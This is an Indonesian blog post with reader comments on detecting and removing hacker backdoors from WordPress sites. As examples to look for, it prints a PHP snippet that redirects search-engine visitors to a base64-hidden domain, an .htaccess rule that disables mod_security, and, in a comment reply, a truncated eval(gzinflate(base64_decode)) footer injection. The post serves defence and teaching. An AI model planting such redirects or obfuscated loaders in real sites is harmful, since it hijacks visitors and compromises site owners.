Cegah Hacker Mengincar WordPress Anda!

Ditulis pada 4 December 2009 pukul 12:18 am oleh Jimmy Ahyari | telah dibaca 467 kali | 67 Komentar

Anda memiliki blog bermesin WordPress? Pernah mendengar bahwa ada yang bisa meng-hack blog berbasis WordPress? Atau Anda pernah melihat secara langung situs favorit Anda –yang masih berbasis WordPress- di-hack? Anda pernah menjadi korban si Hacker?

Ok, sebelum terjadi kesalah-pahaman, Saya hanya ingin mengklarifikasi, sebenarnya istilah Hack (predikat) atau Hacker (subjek) kurang cocok; karena Hack memiliki artian luas, meskipun masyarakat awam mengganggap bahwa Hack atau Hacker selalu ke arah konotasi negatif. Bahkan, Bill Gates -sang pendiri Microsof- pun bisa disebut Hacker.

Dalam artikel ini, Hack/Hacker memiliki arti negatif dan tidak baik. Sepakat? Loh? Koq jadi membahas masalah Hack/Hacker? Baiklah, sekarang kita ke pendahuluan D

Masih ingat saat banyak media memberitakan bahwa blog si A atau si B kena hack? Masih ingat tulisan “Please Update Now” di bagian Dashboard WordPress Anda jika terdapat versi baru? Anda sudah mengupgrade versi WordPress Anda? Belum? Hanya masalah waktu sampai blog Anda juga di hack =))

Malangnya, untuk sebagian blogger yang telah mengupgrade, mereka terkadang terlambat mengantisipasi. Sang hacker malah lebih dulu mengetahui seluk-beluk blog kita (perhatian! Ini bukan BloG kiTa yang ini P ) dan (mungkin) telah meletakkan BackDoor (apa itu? Monggo dicari di om google P ).

Apa yang harus Anda lakukan jika Blog WordPress Anda kena Hack?

  1. Segera upgrade WordPress Anda ke versi yang paling baru.
  2. Yakinkan tidak ada BackDoor atau Malicious Code di sistem Anda. Terkadang sang Hacker meletakkan script baru atau bisa juga merubah file standar WordPress. Cek juga file theme yang Anda gunakan.
  3. Ganti Password lama Anda setelah upgrade selesai. Yakinkan bahwa Hacker tidak membuat admin/user lain di WordPress Anda.
  4. Edit file wp-config.php dan ubah atau buatlah sebuah SECRET_KEY. SECRET_KEY biasanya memiliki format:

define(‘SECRET_KEY’, ‘07081987’)

silakan dirubah angka-angka di atas dengan kreasi Anda sendiri )

Kode Tersembunyi oleh Hacker

Biasanya, para Hacker menggunakan beberapa cara untuk merusak blog WordPress Anda, diantaranya dengan:

  1. Menyembunyikan kode jahat di script php Anda. Jika direktori blog dan file Anda berstatus Writeable oleh WebServer, sang hacker bisa leluasa menanam kode-kode yang menguntungkan mereka. Contoh yang paling sering menjadi sasaran empuk adalah wp-blog-header.php. File theme yang digunakan juga beresiko. Saat Anda meng-upgrade WordPress Anda, file theme Anda tidak ikut berubah, jadi silakan cek sekali lagi. Apalagi jika Anda menemukan file ter-decode, seperti:

< ?php $seref=array("google","msn","live","altavista","ask","yahoo","aol","cnn","weather","alexa");
$ser=0; foreach($seref as $ref) if(strpos(strtolower($_SERVER['HTTP_REFERER']),$ref)!==false){ $ser=”1″; break; }if($ser==”1″ && sizeof($_COOKIE)==0){ header(”Location: http://”.base64_decode(”YW55cmVzdWx0cy5uZXQ=”).”/”); exit; }?>< ?php
DST (kalau ditulis lengkap, ntar disalah gunakan P )

Untuk melihat berbagai macam bentuk script yang mungkin berbahaya, bisa melihat di sini.

  1. Merubah file .htaccess. Cek file .htaccess yang berada di bagian root direktori blog Anda. Jika Anda tidak pernah mengubahnya, maka seharusnya Anda akan melihat kode-kode berikut:

# BEGIN WordPress
<ifmodule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</ifmodule>
# END WordPress

Mungkin juga Anda akan mendapati tambahan kode (biasanya akibat program uploader yang Anda gunakan), seperti:

<ifmodule mod_security.c>
<files async-upload.php>
SecFilterEngine Off
SecFilterScanPOST Off
</files>
</ifmodule>

  1. Memasukkan kode PHP namun disamarkan dengan file berformat jpeg ke direktori upload Anda dan menambahkan beberapa file yang bertugas untuk mengaktifkan beberapa plugin yang mereka kehendaki. Hal ini sulit dideteksi ataupun ditemukan. Namun, bukan hal yang mustahil. Silakan coba cara ini:

- Buka PHPMyAdmin dan masuklah ke options table. Cari data active_plugins

- Edit data tersebut. Anda akan menemukan tulisan-tulisan “aneh” dan panjaaaaaaaaaaaaaaaang sekali. Carilah teks seperti “../uploads/2009/08/07/xzvrtgfhjks.jpg” (perhatikan nama file *.jpg nya. Ingat-ingat apa Anda pernah mengupload file jpg dengan nama aneh begitu? D ). Hapus teks tersebut dan pastikan Anda juga membasmi serialized array information. Hapus juga active_plugins record dan aktifkan semua plugin Anda sekali lagi

- Periksa direktori upload untuk file jpg tersebut. Hapuslah.

- Jika binggung, silakan lihat video ini. Hanya saja, dalam video tersebut ada proses penghapusan rss_* database record. Saya rasa ini tidak terlalu penting (bagi Saya yang awam). Atau ada yang ingin menjelaskan mengapa rss_* juga harus dihapus? )

Ubah Password WordPress Anda

Setiap Anda mengupgrade dan yakin bahwa proses installasi berjalan lancar dan tidak terdapat jejak penyusup, pastikan Anda:

1. Merubah SELURUH password user yang ada dalam sistem WordPress Anda

2. Yakinkan bahwa sang Hacker tidak memiliki akun yang dapat digunakan untuk login suatu saat nanti.

Install Plugin Pendeteksi Hack

Sebagai langkah pengamanan, ada baiknya Anda menginstall WordPress Exploit Scanner yang akan membantu Anda dalam menemukan file/script yang berbahaya yang Ada dalam blog WordPress Anda.

Semoga tulisan sederhana ini akan mengurangi angka pengrusakan situs, khususnya blog bermesin WordPress. Jika ada kesalahan dalam pemaparan, tolong bantu Saya memperbaikinya )

Blogger yang Baik adalah Blogger yang Merawat dan Menjaga Blog-nya.

*sekedar informasi, WordPress yang paling sering kena hack adalah versi 2.6 ke bawah. So, segera upgrade ya! 2.8.6 lho yang sekarang )

Kata Kunci yang digunakan untuk sampai ke tulisan ini:

  • Share/Bookmark
Jimmy Ahyari

67 Orang telah berKomentar untuk tulisan “Cegah Hacker Mengincar WordPress Anda!”

Anda bisa memantau perkembangan komentar di sini melalui atom feed.

  1. iyoong says:

    PertaMaaaxxx…..

    nyimak dulu..,mantep dah…..kaga paham (belum) bhasa PHP…:-B

    jadi kalo dah diupgrade ke versi terbaru, apakah yakin aman ?? -w
    iyoong´s last blog ..Give Them The Spirit alive My ComLuv Profile

  2. reza says:

    Masih belum terlalu paham nih bahasa pemrograman PHP tapi bagus juga nih buat nambah ilmu… 8->
    reza´s last blog ..Visi dan Misi My ComLuv Profile

  3. Zaiful Anwar says:

    Belum gerti tapi gak apalah nambah ilmu juga n makasih info.

  4. aidicard says:

    Panjang amat… ctrl+d aja dulu.. trims info nya bro..

  5. Rizal says:

    info nya membantu … save as j dlu biar diprint …
    Rizal´s last blog ..Indonesia My ComLuv Profile

  6. hotfreez says:

    wah infonya berguna banget…THANKS!!!!

  7. Achmad Fauzi says:

    Wuah mantab mas. trims infonya.
    Salam

  8. manusiahero says:

    bah iyaam.. kada ngerti am WP hohoho 8->
    manusiahero´s last blog ..Renungan Cinta My ComLuv Profile

  9. Irawan says:

    Wah thank’s infonya…
    aku punya tambahan 1 point, selalu backup database website.
    kadang kalo sudah kecolongan, dan data2 kita dirusak satu langkah kecil ini yang bisa menyelamatkan artikel2 kita.
    Irawan´s last blog ..Secangkir Kopi Pahit My ComLuv Profile

  10. iklan baris gratis says:

    ngeri juga kalo wordpress bisa di hack.. secara blog ane semua pake wordpress.. terima kasih infonya manteb.. langsung praktek..

    ups sekalian numpang promosi
    iklan baris gratis
    -bd -bd

  11. Bisnis Online says:

    Mau tanya nih sob, kalau upgrade WP, settingan theme dan pluginnya masih tetap seperti semula ga?
    Bisnis Online´s last blog ..Dengan Sepuluh Dollar Dapat Seratus Domain Gratis My ComLuv Profile

  12. Car Review says:

    nice info gan…
    Car Review´s last blog ..2010 Ford Mustang GT My ComLuv Profile

  13. nurie says:

    blognya keren…..

  14. Lowongan BUMN says:

    waduh untungnya, gak pake word press nih, pake blogger terus

  15. Lowongan kerja bank says:

    mantep nih artikelnya, mesti bookmark dulu kayaknya, ntar malam baru praktekin
    Lowongan kerja bank´s last blog ..Links for 2009-12-19 [Digg] My ComLuv Profile

  16. intermezo says:

    artikel yang sangat bermanfaat bagi para pemakai wp, thanks kawan, blon bisa dihafal nih… jd saya bookmark dulu… )
    intermezo´s last blog ..Kontes SEO Astaga.com My ComLuv Profile

  17. Kompetisi Website Kompas MuDA–KFC says:

    idea
    hacker-hacker tak bertanggung jawab
    Kompetisi Website Kompas MuDA–KFC´s last blog ..Rujak Kuah Pindang My ComLuv Profile

  18. Ngobrol Seputar Bisnis Online says:

    wew. . .keren kang tipsnya. mesti bnyk belajar disini nih kyknya grin
    Ngobrol Seputar Bisnis Online´s last blog ..Daftar Pemenang Kontes Mengembalikan Jati Diri Bangsa My ComLuv Profile

  19. liudin says:

    belum pernah dengar wordpress bisa di hack? klau pun bisa itu mungkin karena keteledoran kita saja dalam menyimpan password dll
    liudin´s last blog ..4 Alasan Utama Untuk Mulai Menulis

    Kalau Saya pernah melihat secara langsung (lupa alamat blognya). Sepertinya bukan masalah menyimpan password, tetapi akibat inject sql

    My ComLuv Profile

  20. topanz says:

    tapi kalo blog seperti blog saya ngga bakal dah ada hacker tertarik buat ngejahilin..biasanya blog2 gede tuh..hehehehe..salam kenal mas grin
    topanz´s last blog ..Selamat Jalan Gus Dur My ComLuv Profile

  21. Zian X-Fly says:

    Makasih banyak infonya. Tapi blog saya rusak justru karena saya sendiri salah mengubah tempalte. Gimana ya memperbaikinya? Login pun saya tidak bisa di zianxfly.web.id
    Zian X-Fly´s last blog ..Dunia Baru My ComLuv Profile

  22. yanti tukang kerupuk says:

    kau pernah kena hack tuh….untung gak parah banget….
    yanti tukang kerupuk´s last blog ..Energi kita adalah kerja keras My ComLuv Profile

  23. yanti tukang kerupuk says:

    maksudnya blog aku pernah kena hack mas….typo! Maaf,salam.

  24. fiki says:

    nice post arrow
    fiki´s last blog ..Grosir Jaket Batik My ComLuv Profile

  25. CDMA Blackberry says:

    waduh mesti ekstra hati hati nih, biar gak kena hack. salah satu cara yg cukup bagus adalah sering ganti password kali yah?
    CDMA Blackberry´s last blog ..Multi Touch In Google Nexus One My ComLuv Profile

  26. tips computer says:

    wah-wah halaman ini mah harus di bookmarked dulu sob, makasih inphonya yah -bd
    tips computer´s last blog ..Partisi harddisk My ComLuv Profile

  27. http://absensisidikjari.com/ says:

    Luarbiasa bos tipsnya! Matur Tank’s

    Regard’s

  28. Laston says:

    makasih infonya bro.. apa sama dengan Blogger juga ya?
    Laston´s last blog ..“Kerikil” di dalam panitia Angket Century

    Kemungkinan berbeda, karena kita tidak bisa masuk ke root milik blogger

    My ComLuv Profile

  29. annosmile says:

    makasih banget infonya
    memang walaupun hanya sebuah blog tetap berharga bagi saya..

  30. madhe says:

    salam kenal mas.

    ane orang ngalam..

    kunjugan balik yah..
    madhe´s last blog ..Liburan yang mengenaskan.. My ComLuv Profile

  31. Human Biology says:

    ah pusing mas…
    gak begitu paham sih masalah begituan.. @-)
    Human Biology´s last blog ..Guide to Have Healthy and Beautiful Body My ComLuv Profile

  32. DianRibut says:

    thankss dah sharing. .

    haduh,aku belum upgrade lagi mass. .

    harus segera niehh
    DianRibut´s last blog ..Kompetisi Website Kompas MuDA – KFC My ComLuv Profile

  33. Terpal says:

    wah….ane pake wordpress gan….

    bahaya nih….

  34. apriannor says:

    agggrrrrhhhhh!!!!!!
    goaway
    I hope Force be with my blog twisted

  35. irmanf says:

    fiuhh, ternyata sang hacker juga mengincar wordpress rupanya… !
    wah, harus waspada nih.
    irmanf´s last blog ..Tips Jitu Merawat Cartridge Printer Agar Awet My ComLuv Profile

  36. agus darmika says:

    wwwiihhh…jadi ngeri jg nih,

  37. sms cinta lucu says:

    wah,makasih infonya…
    sms cinta lucu´s last blog ..SMS Romantis – Kesungguhan Cinta My ComLuv Profile

  38. Alam says:

    wah makasih banget nih informasinya….
    sangat membantu saya…
    thanks.. arrow
    Alam´s last blog ..Spesifikasi Kamera Digital Pentax K-7 My ComLuv Profile

  39. Lirik Lagu Terbaru says:

    informasi yang berguna

    terima kasih banyak
    Lirik Lagu Terbaru´s last blog ..Audy – Selalu Terdepan My ComLuv Profile

  40. Nowgoogle.com Adalah Multiple Search Engine Popular says:

    sekarang banyak sekali blog2 yang kena hack…salah satunya temen saya

    aku coba tutorialnya…mudah2an bermanfaat ini angel
    Nowgoogle.com Adalah Multiple Search Engine Popular´s last blog ..By: Khairuddin syach My ComLuv Profile

  41. Putra Blambangan says:

    Makasih informasinya mas, sangat membantu nich soalnya saya termasuk pendatang baru di Dunia Wordpress
    Putra Blambangan´s last blog ..Seo Google Oleh Team Ajib My ComLuv Profile

  42. hape says:

    makasih.. makasihh..
    ijin save page om..hehe grin grin

  43. nayantaka says:

    beberapa minggu yang lalu, blog saya juga kena hack
    sayangnya saya belum baca tutorial ini
    :(
    nayantaka´s last blog ..Penyebab Adsense di banned | Autocontent | Autoblog My ComLuv Profile

  44. nayantaka says:

    selamat siang mas,..
    saya tertarik dengan content blog ini, RSS feed ahyari[dot]com, saya pasang di widget. Supaya kalau ada berita baru, saya bisa segera tahu
    nayantaka´s last blog ..Penyebab Adsense di banned | Autocontent | Autoblog

    Selamat malam menjelang dini hari D Waah.. terimakasih sudah bersedia meletakkan RSS Feed saya.. sukses selalu untuk Anda..

    My ComLuv Profile

  45. Grosir Sandal says:

    Wah takut juga ini setelah baca artikelnya, cuma jujur aja masih belum paham ma yang di jelas disini.X_X perlu mempelajari lebih dalam ni sepertinya.

  46. kado ulang tahun says:

    simak dulu gan, di pelajari dulu. ga mudeng bahasanya tingkat tinggi,
    kado ulang tahun´s last blog ..jasa pembuatan karikatur berkualitas My ComLuv Profile

  47. fansbook says:

    tipnya mantep gan… makasih atas tips ama sarannya…
    oh ya mau nggak gan tukeran link
    fansbook´s last blog ..The role of SEO for Internet business My ComLuv Profile

  48. Website Bizweb says:

    wah strategi yang jitu buat wordpressnya
    angel

  49. Realodix says:

    Terima kasih untuk infonya.. smile
    Realodix´s last blog ..EARTH HOUR: Sebuah Event Pemilu Global My ComLuv Profile

  50. ALRIS says:

    Tutorial hebat. Salam kenal.

  51. Asop says:

    Apakah wordpress yang bisa diserang cuman wp yang berbayar ya? -?

    Tidak juga.. Beberapa waktu yang lalu, pernah ada yang kena.. tapi sifat serangan tentu berbeda.. biasanya sih gara2 password yang terjerat program semacam keylogger

  52. Rahad 2 Six says:

    dulu sih sempet pake mesin wordpress yg gratisan..
    tapi sekarang udah beralih ke blogspot…soalnya wordpress gratisan gak fleksibel…

    Betul.. WordPress gratisan memang tidak seflexibel blogspot.. namun, jika punya dana, wordpress yang diinstall sendiri, lebih POWERFULL; seperti blog ini =))

  53. Alwi says:

    MEMANG HARUS WASPADA …. DAN TERUS MENINGKATKAN KEAMANAN BLOG WORDPRESS … TERUTAMA DARI SISI PENGGUNA/PEMILIK …. SUDAH BANYAK TEMAN2 SAYA KENA HACK PADAHAL SAYA JUGA PERNAH NULIS TTG PENTINGNYA MENJAGA KEAMANAN WORDPRESS TAPI ADA BEBERAPA BANYAK JUGA SAYA CEK MASIH2 SANGAT2 RENTAN UNTUK DISERANG ….
    Alwi´s last blog ..Cari Aplikasi Gratis Lewat ZeuApp My ComLuv Profile

  54. Achmad Allam says:

    Lha kalau dihack, username dan password tidak bisa dijalankan. Cara mengatasinya bagaimana? Mohon info

    Tinggal masuk ke database, di sana terdapat table informasi “user” yang berisi username dan password )

  55. Trik Blogger says:

    waduhh untung belum nggunain si wordpress.
    Trik Blogger´s last blog ..Google Saingi Facebook dan Twitter My ComLuv Profile

  56. Modifikasi Dashboard WordPress | ahyari [dot] com says:

    [...] karena ini penting. WordPress terbaru biasanya tingkat keamanannya lebih tinggi. Juga agar Mencegah WordPress Anda diincar Hacker. Tapi kalau cuma ingin coba-coba, [...]

  57. Selamat datang Di Planet Agregator Blog farmasi says:

    [...] karena ini penting. WordPress terbaru biasanya tingkat keamanannya lebih tinggi. Juga agar Mencegah WordPress Anda diincar Hacker. Tapi kalau cuma ingin coba-coba, [...]

  58. bowo says:

    cocok boz buta yang baru belajar WP.org…hehehe
    bowo´s last blog ..Komputer Mampu ‘Ramalkan’ Kemacetan My ComLuv Profile

  59. Lyrics says:

    Bos makasih neh pluginnya…. ribet jg yah kalo blog kita dah bgs… kalo belum mah sapa yg mau ngehack…hehe
    Lyrics´s last blog ..Five For Fighting Nyc Weather Report Lyrics My ComLuv Profile

  60. bimaSakti85 says:

    sikret kii nya yg di wp-connfig tuu fungsinya buat apa yaak om ?

  61. Iseng Ngeblog says:

    Makasih infonya gan, periksa dulu ah sapa tau ada yang aneh
    soalnya banyak bot masuk ni
    Iseng Ngeblog´s last blog ..Choosing Laptop Backpack My ComLuv Profile

  62. syahrizal says:

    mantap nih…bener kalau Wp harus sring di upgrate…saya dah kena..dan sekarang dah apgrate tapi masih ada sisa hack..ada link yang masuk di theme tanpa sepengetahuan saya…dah saya bongkar dieditor enggak ada kelihatan dimana dia sembunyi linknya …mohon bantuan nih…gimana cara mengetahui link yang masuk ke theme kita…sementara kita tidak pernah merasa buat link itu..
    syahrizal´s last blog ..Seribuan Umat Lintas-Agama Datangi Istana Siang Nanti My ComLuv Profile

    1. Jimmy Ahyari says:

      Kalau boleh tahu, linknya ada dibagian mana? footer? bisa jadi linknya di decode..
      Jimmy Ahyari´s last blog ..Kartu Kreditku Naik Pangkat My ComLuv Profile

  63. syahrizal says:

    iya di bagian fhoter saya lihat di page soarce dia buat table html dan memasukkan linknya mmm boleh tau YMnya pak malam ini saya online
    syahrizal´s last blog ..Seribuan Umat Lintas-Agama Datangi Istana Siang Nanti My ComLuv Profile

    1. Jimmy Ahyari says:

      wah.. maaf pak, sekarang hanya via hape.. namun, Saya bisa menyarankan Anda untuk membaca di http://codex.wordpress.org/FAQ_Layout_and_Design#How_to_get_rid_of_encoding_in_a_theme.27s_footer.3F .

      Buka file footer.php Anda, dan temukan kode-kode “aneh” seperti:

      < ? eval(gzinflate(base64_decode('FZrHDvPIsUZfxTvPgAvmBBseiDkHMXN zwZxz5tNf/dJKgECxu6vqO4fQP//77z//Ks6k/6t6m7Hsk734K022gsD+Ly+yKS ?>

      Biasanya diawali dengan base64_decode..
      Semoga bisa membantu..

  64. syahrizal says:

    trimakasih banyak atas bantuannya akan saya coba..salam persahabatan dan salam ukhuwah moga jadi ladang amal amiin
    syahrizal´s last blog ..Seribuan Umat Lintas-Agama Datangi Istana Siang Nanti My ComLuv Profile

  65. kang paidjo says:

    waduh mas.. baru saja web saya kena deface..
    kang paidjo´s last blog ..Repair Grub Ubuntu Setelah Install Windows My ComLuv Profile

Leave a Reply

( * ) Wajib Diisi

CommentLuv Enabled